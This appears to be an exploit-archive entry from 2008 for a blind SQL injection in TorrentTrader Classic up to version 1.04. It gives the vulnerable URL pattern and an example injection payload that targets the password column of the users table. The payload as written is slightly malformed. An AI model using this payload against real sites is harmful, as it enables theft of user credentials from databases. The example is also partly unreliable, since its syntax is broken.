[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : TorrentTrader Classic <= 1.04 Blind SQL Injection Vulnerability
# Published : 2008-10-07
# Author : BazOka-HaCkEr
# Previous Title : Built2Go PHP RealEstate 1.5 (event_detail.php) SQL Injection Vuln
# Next Title : asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerabilities


======================================================
 
==> TorrentTrader Classic <= 1.04 Blind SQL Injection Exploit
 
======================================================
 
==> NamE      : TorrentTrader Classic
 
==> version    : 1.04
 
==> Download : www.torrenttrader.org
 
======================================================
 
==> AuThOr : BazOka-HaCkEr
 
==> EmaiL   : x9j@HoTmaiL.Com
 
==> HomE   : WwW.TrYaG.cc/cc
 
======================================================
 
==> ExplO!te :
 
==> www.TarGeT.com/paTh/completed-advance.php?id=[SQL]
 
==> ExampLe :
 
==> www.TarGeT.com/tracker/completed-advance.php?id=180+AND ascii(SUBSTRING((SELECT Count(password) FROM users LIMIT 1,1)1,1)
 
======================================================
 
==> GreeTz :
 
==> ll Abu-Mahdi ll FeezO ll Mr.SQL ll MoGaTiL ll Abo-Najm ll alra7el ll
 
======================================================

# www.Syue.com [2008-10-07]